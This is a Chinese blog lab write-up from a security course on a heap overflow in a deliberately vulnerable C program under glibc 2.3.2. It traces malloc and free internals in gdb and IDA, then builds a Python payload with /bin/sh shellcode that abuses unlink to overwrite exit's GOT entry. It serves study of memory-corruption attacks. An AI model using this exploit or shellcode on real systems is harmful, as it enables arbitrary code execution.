linux下堆溢出实验和一些tips

最新推荐文章于 2022-03-11 09:41:38 发布
最新推荐文章于 2022-03-11 09:41:38 发布
阅读量4.8k 收藏 3
点赞数
分类专栏: 软件破解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78105843
版权

首先我的实验环境和教程均来自http://staff.ustc.edu.cn/~sycheng/ssat/,我这里讲的是《缓冲区溢出–堆溢出》这个课程的实验
实验开始,首先你要准备好环境,我的操作系统是BOF_debian2.4.18,你可以在https://pan.baidu.com/share/link?uk=447211&shareid=2477082370#list/path=%2F&parentPath=%2F000dak
实验代码是:

#include<stdio.h>
#include<stdlib.h>
#include <malloc.h>
int main (int argc, char *argv[])
{
        char *buf, *buf1,*buf2;
        FILE *infile;
        int rc;
        infile = fopen("payload.txt", "rb");
        if(infile == NULL ) {
        printf("%s, %s",argv[1],"not exit/n");
        exit(1);
         }

        buf = malloc (32);
        buf1 = malloc (8);
        //buf2=malloc(16);
        while( (rc = fread(buf,sizeof(unsigned char),1024,infile)) != 0 );
        free (buf);
        free (buf1);
        exit(0);
        //free(buf);
        return 0;
}

学习堆溢出的时候先要学一点堆的知识,参考一些有用的链接:
https://jaq.alibaba.com/community/art/show?articleid=315
https://jaq.alibaba.com/community/art/show?articleid=334
http://www.cnblogs.com/alisecurity/p/5563819.html
http://www.freebuf.com/articles/system/91527.html
http://www.vuln.cn/6172

把上面的代码保存成heap_overflow.c用gcc -g heap_overflow.c -o heap_overflow
我用gdb调试这个代码,调试之前要先修改.gdbinit,从而更方便的调试,我把我用的.gdbinit放在https://github.com/niexinming/safe_tool/blob/master/gdbinit
在代码的15行下断点,在gdb中输入ni在汇编代码中单步运行到call malloc之后观察内存中分配的堆块的内容:
image
注意函数返回后,返回值一般都会保存在eax中,程序在call完malloc之后,eax保存就是堆块数据区地址,对照

struct malloc_chunk {
  INTERNAL_SIZE_T      prev_size;  /* 前一个chunk的大小 (如果前一个已经被free)*/
  INTERNAL_SIZE_T      size;       /* 字节表示的chunk大小,包括chunk头       */
  struct malloc_chunk* fd;         /* 双向链表 -- 只有在被free后才存在       */
  struct malloc_chunk* bk;
};

可以知道0x40143d40是前一个堆的大小(如果前一个堆被释放的话),0x00000029是当前块的大小(包括块头),后面的是分配给堆的数据,而malloc执行完之后,指针指向的也是堆数据区开头
在gdb中按一次n,看下一个堆分配的状况
image
因为前面的堆是占用的状态,所以,0x080499a8的值是0x00000000,而因为是第二次分配堆地址,可以看到顶块的占用减少了16个字节,由第一次分配的0x00021659变成第二次分配后的0x00021649

如果足够细心,上面堆快大小比实际大一个字节,因为
image
堆内存中要求每个chunk的大小必须为8的整数倍,因此chunk size的后3位是无效的,为了充分利用内存,堆管理器将这3个比特位用作chunk的标志位,典型的就是将第0比特位用于标记该chunk是否已经被分配,所以当通过gdb以二进制查看查看chunk size的时候,可以看到那个标志位的值
image

因为堆溢出最主要的是要进入unlink这个宏函数,所以为了方便调试,要先确定glibc的版本
image
可以确定我的glibc的版本是2.3.2,到官网把源码下载下来下载地址:http://ftp.gnu.org/gnu/glibc/glibc-2.3.2.tar.bz2

在调试的时候走到call free 的时候在gdb中输入si进入到free函数中,但是我在调试的时候,发现glibc的源码与反汇编的代码有点对不上,于是,我用gcc把程序生成一个带静态库的可执行文件(使用命令:gcc -g heap_overflow.c -o heap_overflow -static),然后下载下来,用ida打开,先查看free函数(因为我在glibc源码没有找到对应的函数,所以我用ida打开)
image

  if ( _free_hook )
  {
    _free_hook(a1, retaddr);
  }

上面的代码判断是否有内存钩子,如果有执行钩子函数,如果没有就往下

 else if ( a1 )

上面的代码判断释放的地址是否存在

    v1 = *(_DWORD *)(a1 - 8 + 4);
    if ( v1 & 2 )
    {
      munmap_chunk();
    }

上面的代码中的a1是堆的数据区地址,a1-8+4其实a1+4的地址,其实v1就是堆的size的地址,因为size的后三位是作为标志位的,所以if ( v1 & 2 )其实是在判断当前chunk是否是通过mmap系统调用产生的(其实这个判断代码是

#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)

的宏展开)

    else
    {
      v2 = (int)&main_arena;
      if ( v1 & 4 )
        v2 = *(_DWORD *)((a1 - 8) & 0xFFF00000);
      *(_DWORD *)v2 = 1;
      int_free(v2, a1);
      *(_DWORD *)v2 = 0;
    }

上面的代码先判断当前chunk是否是thread arena,而if ( v1 & 4 )这个代码则是

#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)

的宏展开
如果chunk size的后三位要是000才能进入到int_free函数,所以chunk size必须要是8的倍数

下面进入到ini_free函数
image
在ini_free函数中首先判断释放的指针是否存在

    v2 = a2 - 8;    ///v2保存的是prev_size的指针
    v3 = *(_DWORD *)(a2 - 8 + 4); //v3保存的是size的值
    v4 = *(_DWORD *)(a2 - 8 + 4) & 0xFFFFFFF8;//v4保存的是size与0xFFFFFFF8做&运算之后的值,其实是去掉chunk size 标志位之后的值,也就是实际堆的大小值
    if ( a2 - 8 > -v4 )
    {
      v16 = check_action;
      if ( check_action & 1 )
      {
        v17 = stderr;
        v18 = *((_DWORD *)stderr + 15);
        *((_DWORD *)stderr + 15) |= 2u;
        fprintf(v17, "free(): invalid pointer %p!\n", a2);
        *((_DWORD *)stderr + 15) |= v18;
        v16 = check_action;
      }
      if ( v16 & 2 )
        abort();
    }

上面的代码中if ( a2 - 8 > -v4 ) 这个判断堆指针是否溢出,如果chunk size太大,则可能会导致堆指针溢出。
再往下看:

    else
    {
      v5 = *(_DWORD *)(a1 + 40);
      if ( v4 > v5 )
      {
        if ( v3 & 2 )
        {
          v15 = *(_DWORD *)(a2 - 8);
          --dword_80AE5EC;
          dword_80AE5FC -= v15 + v4;
          munmap((void *)(v2 - v15), v15 + v4);
        }
        else
        {
          v21 = v4 + v2;
          v19 = *(_DWORD *)(v4 + v2 + 4);
          v20 = v19 & 0xFFFFFFF8;
          if ( !(v3 & 1) )
          {
            v7 = *(_DWORD *)(a2 - 8);
            v2 -= v7;
            v4 += v7;
            v8 = *(_DWORD *)(v2 + 8);
            v9 = *(_DWORD *)(v2 + 12);
            *(_DWORD *)(v8 + 12) = v9;
            *(_DWORD *)(v9 + 8) = v8;
          }
          if ( v21 == *(_DWORD *)(a1 + 84) )
          {
            *(_DWORD *)(a1 + 84) = v2;
            v4 += v20;
            v13 = v4 | 1;
          }
          else
          {
            if ( *(_BYTE *)(v20 + v21 + 4) & 1 )
            {
              *(_DWORD *)(v21 + 4) = v19 & 0xFFFFFFFE;
            }
            else
            {
              v10 = *(_DWORD *)(v21 + 12);
              v11 = *(_DWORD *)(v21 + 8);
              *(_DWORD *)(v11 + 12) = v10;
              *(_DWORD *)(v10 + 8) = v11;
              v4 += v20;
            }
            *(_DWORD *)(v4 + v2) = v4;
            v12 = *(_DWORD *)(a1 + 100);
            *(_DWORD *)(v2 + 12) = a1 + 92;
            *(_DWORD *)(v2 + 8) = v12;
            *(_DWORD *)(a1 + 100) = v2;
            v13 = v4 | 1;
            *(_DWORD *)(v12 + 12) = v2;
          }
          *(_DWORD *)(v2 + 4) = v13;
          if ( v4 > 0xFFFF )
          {
            if ( !(*(_BYTE *)(a1 + 40) & 1) )
              malloc_consolidate(a1);
            if ( (int *)a1 == &main_arena )
            {
              if ( (*(_DWORD *)(dword_80AE1B4 + 4) & 0xFFFFFFF8) >= mp_ )
                sYSTRIm(dword_80AE5E4, &main_arena);
            }
            else
            {
              v14 = *(_DWORD *)(a1 + 84);
              heap_trim(v2, dword_80AE5E4);
            }
          }
        }
      }

这段代码终于找到对应的源码了(在malloc.c:4138):


    if ((unsigned long)(size) <= (unsigned long)(av->max_fast)

#if TRIM_FASTBINS
        /*
           If TRIM_FASTBINS set, don't place chunks
           bordering top into fastbins
        */
        && (chunk_at_offset(p, size) != av->top)
#endif
        ) {

      set_fastchunks(av);
      fb = &(av->fastbins[fastbin_index(size)]);
      p->fd = *fb;
      *fb = p;
    }

    /*
       Consolidate other non-mmapped chunks as they arrive.
    */

    else if (!chunk_is_mmapped(p)) {
      nextchunk = chunk_at_offset(p, size);
      nextsize = chunksize(nextchunk);
      assert(nextsize > 0);

      /* consolidate backward */
      if (!prev_inuse(p)) {
        prevsize = p->prev_size;
        size += prevsize;
        p = chunk_at_offset(p, -((long) prevsize));
        unlink(p, bck, fwd);
      }

      if (nextchunk != av->top) {
        /* get and clear inuse bit */
        nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

        /* consolidate forward */
        if (!nextinuse) {
          unlink(nextchunk, bck, fwd);
          size += nextsize;
        }

上面的代码首先检查当前块的大小是否是属于fastbins(我在内存中查看max_fast的大小只有72,也就是说,当前堆快大于72的时候就可以进入到合并堆快的操作中了),后面的操作就行先判断prev_size的标志位是否释放,如果前块堆如果释放,那么就和当前堆合并,也就是进入到unlink这个宏函数中,然后判断后面的堆快是不是空闲,如果空闲的话,再合并
下面我进到构造一个payload,然后到_int_free中去调试一下
payload:

import os
os.system("rm -f payload.txt")
data="a"*32+"\x58"+"\x00"*3+"\x58"+"\x00"*3
f=open("payload.txt","wb")
f.write(data)
f.close();

在程序的第15行下断点,记录下buf的地址
image
buf的地址是0x08049988,此时这段数据区间为空
然后在20行下断点:
再次查看buf中的数据:
image
这里注意这里覆盖的size值必须大于0x48,而且size的后三bit要为0,比如0x58转换成二进制时就是‭01011000,其中后bit是000,代表着三个标志位,最后一个bit为0则是代表区块已被释放
在gdb中输入si后进入到free函数后一直输入ni一路走到int_free中
,进入init_free函数之前要查看一下参数
image

然后往下运行:
image
上图是第一个判断点,判断要释放的指针是否为空

image
上图是第二个判断点,判断堆指针是否溢出
image
上图是第三个判断点,判断当前块的大小是否是属于fastbins
image
上图是第四个判断点,判断chunk是否是通过mmap系统调用产生的,这个的判断相当于

#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)

宏展开
image
上图是第五个判断点,判断上一个chunk是否是空闲,这个判断相当于

#define prev_inuse(p)       ((p)->size & PREV_INUSE)

的宏展开

经过很多对于堆快的检查之后,后面进入到合并堆的操作了,也就是进入到unlink(p, bck, fwd);这个宏函数中

这一步有很多文章在讲,我就不详细讲原理了,直接开始调试
在调试之前,我把payload改成

import os
os.system("rm -f payload.txt")
data="a"*32+"\x20"+"\x00"*3+"\x58"+"\x00"*3
f=open("payload.txt","wb")
f.write(data)
f.close();

然后进入gdb,在20行断下
查看一下buf地址中数据
image

按c继续执行
image
发现程序崩溃,崩溃的地方是,mov DWORD PTR [edx+12],eax 程序正尝试把eax的值写入地址edx+12地方,由于edx为61616161,是一个非法的地址,所以程序报错,我把断点下在0x4008d365(也就是崩溃的地址再往上一点的地址),查看edx和eax是哪里来的
image
通过查看内存中的值,我可以看出,ecx保存的是指向buf1堆头的地址,edi保存是指向buf1堆体的地址,esi保存的是本堆块的size值

0x4008d365 <mallopt+1653>:	mov    eax,DWORD PTR [edi-8]  //取出上一块堆块的大小放入eax
0x4008d368 <mallopt+1656>:	sub    ecx,eax //本堆块地址上移0x20个字节
0x4008d36a <mallopt+1658>:	add    esi,eax //计算合并之后的大小
0x4008d36c <mallopt+1660>:	mov    edx,DWORD PTR [ecx+8]
0x4008d36f <mallopt+1663>:	mov    eax,DWORD PTR [ecx+12]
0x4008d372 <mallopt+1666>:	mov    DWORD PTR [edx+12],eax
0x4008d375 <mallopt+1669>:	mov    DWORD PTR [eax+8],edx
0x4008d378 <mallopt+1672>:	mov    edx,DWORD PTR [ebp-16]
0x4008d37b <mallopt+1675>:	mov    edi,DWORD PTR [ebp-20]
0x4008d37e <mallopt+1678>:	cmp    edi,DWORD PTR [edx+84]

上面的汇编代码对应源代码是:

        prevsize = p->prev_size;
        size += prevsize;
        p = chunk_at_offset(p, -((long) prevsize));
        unlink(p, bck, fwd);

查看ecx-eax
image
从上图中可以看到地址ecx-0x20+0x8和ecx-0x20+0xc这两个位置都可以被控制的,也就是说,我们获得了一次向任意地址写任意值的机会
这里有两个问题,第一:向哪里写,第二,写什么
向哪里写?
常规的方法是覆盖got表
关于got表的资料:http://blog.csdn.net/qq_18661257/article/details/54694748
通过objdump -R Dheap_overflow来查看
image
因为代码执行完之后执行exit,所以写入的位置是got中exit的地址,也就是0x080497b0

写入什么呢?
首先我先把找到的shellcode放入内存中,然后把shellcode的起始地址写入就好

我把payload改一下:

import os
shellcode="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
print len(shellcode)
os.system("rm -f payload.txt")
data="a"*8+"\xa4\x97\x04\x08"+"\xb0\x99\x04\x08"+"b"*16+"\x20"+"\x00"*3+"\x58"+"\x00"*3+"\x90"*35+shellcode+"\x00"*4+"\x01\x00\x00\x00"
f=open("payload.txt","wb")
f.write(data)
f.close();

在第20行的地方下一个断点,然后观察内存
image

内存布局好之后,我运行过free之后,查看0x080497b0地址的值
image
发现地址0x080497b0已经被成功的写入了shellcode起始地址0x080499b0,成功的劫持了exit函数,再往下执行就会跳到shellcode的地址去执行任意代码了
image
直接执行这个程序的话就会弹出/bin/sh,也就是shellcode执行的结果
image

niexinming
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
一次 Java 进程 OOM 的排查分析(glibc 篇)
AI乔治
09-23 1266
遇到了一个 glibc 导致的内存回收问题,查找原因和实验的的过程是比较有意思的,主要会涉及到下面这些: Linux 典型的大量 64M 内存区域问题 glibc 的内存分配器 ptmalloc2 的底层原理 如何写一个自定义的 malloc hook 动态链接库 so glibc 的内存分配原理(Arena、Chunk 结构、bins 等) malloc_trim 对内存真正回收的影响 gdb 的 heap 调试工具使用 jemalloc 库的介绍与应用 背景 前段时间有同学反馈一个 j
linux 溢出学习之house of spirit(1) malloc maleficarum hos翻译
jmp esp
03-02 2250
综述house of spirit是一种常用的溢出技术,而在如今的malloc实现依然没有对这种方法进行保护,所以在目前还是一种有效的溢出技术。下面我们先从这种方法的来源之本讲起,即2005 Malloc Maleficarumcsdn原文 The House of SpiritThe House of Spirit is primarily interesting because of th
unlink 攻防世界4-ReeHY-main
csdn546229768的博客
12-10 583
例题:攻防世界 4-ReeHY-main 当一个chunk释放为unsort bin时会检查上下是否为free chunk,如果上为free chunk则发生合并、合并后会调用unlink函数:(2.23) /* consolidate backward */ if (!prev_inuse(p)) { //当前的p标志位为0(上个chunk free) prevsize = p->prev_size; size += prevsize; //本chunk的size
linux笔记(二)——相关的数据操作
segogt的博客
01-20 6693
溢出 概述 溢出指的是程序向某个写入字节数超过了块本身可用字节,因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个块。 发生情况 程序向上写入数据。 写入的数据大小没有被良好地控制。 一般的利用思路 覆盖与其物理相邻的下一个 chunk 的内容。 prev_size size,主要有三个比特位,以及该块真正的大小。 NON_MAIN_ARENA IS_MAPPED P...
malloc_chunk边界标记法和空间复用
simple
09-18 4248
ptmalloc分配的空间统一用了malloc_chunk结构来管理,malloc_chunk的结构初看比较奇葩,看了注释,分析了一段时间的代码,发现这种边界标记的设计,在malloc_chunk虚拟地址都是彼此相邻的情况下,是十分高效的。 malloc_chunk结构: struct malloc_chunk { INTERNAL_SIZE_T prev_size; /
内存(7)——内存释放入口函数_lib_free
qq_42584874的博客
03-11 546
_libc_free void __libc_free (void *mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ void (*hook) (void *, const void *) = atomic_forced_read (__free_hook); if (__builtin_expect (hook != NULL, 0))
Windows平台下的溢出利用技术
02-26
开头我讨论了在旧版本Windows下利用溢出的技术,试着给读者提供一些关于unlink过程是怎样执行的、以及freelist[n]里面的flink/blink是如何被攻击者控制并提供简单的任意“4字节写”操作的实用的知识。本文的主要...
Linux下基本栈溢出攻击
01-30
但是,由于这种攻击方法产生的时间比较长,故而GCC编译器、Linux操作系统提供了一些机制来阻止这种攻击方法对系统产生危害。下面首先了解一下现有的用于保护栈的机制以及关闭相应保护机制的方法,为进一步分析基本...
实验 Linux 下的缓冲区溢出实践1
最新发布
08-08
实验一:Linux下的缓冲区溢出实践1 1. 实验目的 本次实验的主要目标是深入理解Linux系统下的缓冲区溢出机制。通过实践,学习者将了解到如何利用缓冲区溢出进行攻击,并掌握防范此类攻击的方法。实验旨在增强对程序...
基于Linux溢出攻击和防御研究.pdf
09-06
"基于Linux溢出攻击和防御研究" 本文主要介绍了基于Linux溢出攻击的基本原理和防御方法。溢出攻击是一种常见的安全问题,它可以导致程序的崩溃或恶意代码的执行。Linux操作系统的栈结构使得其...
linux内存管理之malloc
weixin_34332905的博客
04-22 216
对于内核的内存管理,像kmalloc,vmalloc,kmap,ioremap等比较熟悉。而对用户层的管理机制不是很熟悉,下面就从malloc的实现入手.( 这里不探讨linux系统调用的实现机制. ) ,参考了《深入理解计算机系统》和一些网上的资料. 首先从http://ftp.gnu.org/gnu/glibc下载glibc...
PWN之利用-unlink攻击
susuate的博客
07-18 1653
环境配置 笔者使用ubuntu14.04.6_desktop_i386 国内镜像网站如下: http://mirrors.aliyun.com/ubuntu-releases/14.04/ glibc版本2.20 unlink攻击
初级溢出-unlink漏洞
baoan4763的博客
09-30 121
Linux下堆的unlink漏洞 参考文章:https://blog.csdn.net/qq_25201379/article/details/81545128 首先介绍一下Linux块结构: struct malloc_chunk { INTERNAL_SIZE_T prev_size; INTERNAL_SIZE_T size; struct malloc_chu...
Linux C unlink函数
yekui006的博客
03-17 714
相关函数:link, rename, remove 头文件:#include <unistd.h> 定义函数:int unlink(const char * pathname); 函数说明:unlink()会删除参数pathname 指定的文件. 如果该文件名为最后连接点, 但有其他进程打开了此文件, 则在所有关于此文件的文件描述词皆关闭后才会删除. 如果参数pathname 为一符号连接, 则此连接会被删除。 返回值:成功则返回0, 失败返回-1, 错误原因存于errno 错误代码: 1、ER
自己做的笔记 估计别人看不懂
weixin_30435261的博客
07-07 69
在打包上传app的时候几个错误改正 1.出现uuid什么之类的错误 打开你的工程TH.xcodeproj点击右键显示包内容,然后找到project.pbxproj然后再用记事本打开,然后commed+F 找到关于PROVISIONING_PROFILE的所有东西全部删除 这个错误就会消失 2.出现腾讯啥的第三方错误 找到你的infoplist文件的Executable fi...
ollydbg实践菜鸟级数组溢出
草色烟光
01-17 1252
本例来自于《0day安全,软件漏洞分析技术》,但是由于ollydbg使用功底太差,而且这东西的调试远没有vs等工具智能,因而最初使用上出现了一些问题,记录一下,为后面的学习打点基础。 第一步,先用vc 6.0写一个验证密码的小程序,代码如下: // crack.cpp : Defines the entry point for the console app
Pwn-Overflow Free Chunk(溢出)
CharlesGodX的博客
03-22 1161
0x00:前言 这次介绍一种和栈溢出类似名字的溢出攻击,首先借用应用CTF-Wiki上的例子理解一下堆溢出。 0x01:漏洞介绍 溢出是指程序向某个写入的字节数超过了块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个块,我们用两...
在栈溢出溢出利用SEH
wangtiankuo的博客
11-02 1199
本文总结自《0day安全:软件漏洞分析技术》 1.TEB 该部分参考自https://bbs.pediy.com/thread-223816.htm 作者:AperOdry  ntdll.NtCurrentTeb()函数返回当前线程的TEB结构体指针。   fs:[0x18]处存放当前线程TEB结构体指针,值009BF00,即fs:[0x0]是TEB的起始地址。 此处介绍第一个结构...
溢出原理和利用学习
热门推荐
sinat_31054897的博客
09-05 1万+
做PWN题经常遇到栈溢出,有时一些栈的基础知识总是记不清楚,脑子卡顿,所以整理一番,让自己彻底记住它! 1. 什么是栈? 栈,即栈,是一种具有一定规则的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶。 栈数据结构的两种基本操作: PUSH:将数据压入栈顶 POP :将栈顶数据弹出 知道了什么是栈,我们看看栈在内存是怎样一个分布情况。 以Linu...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值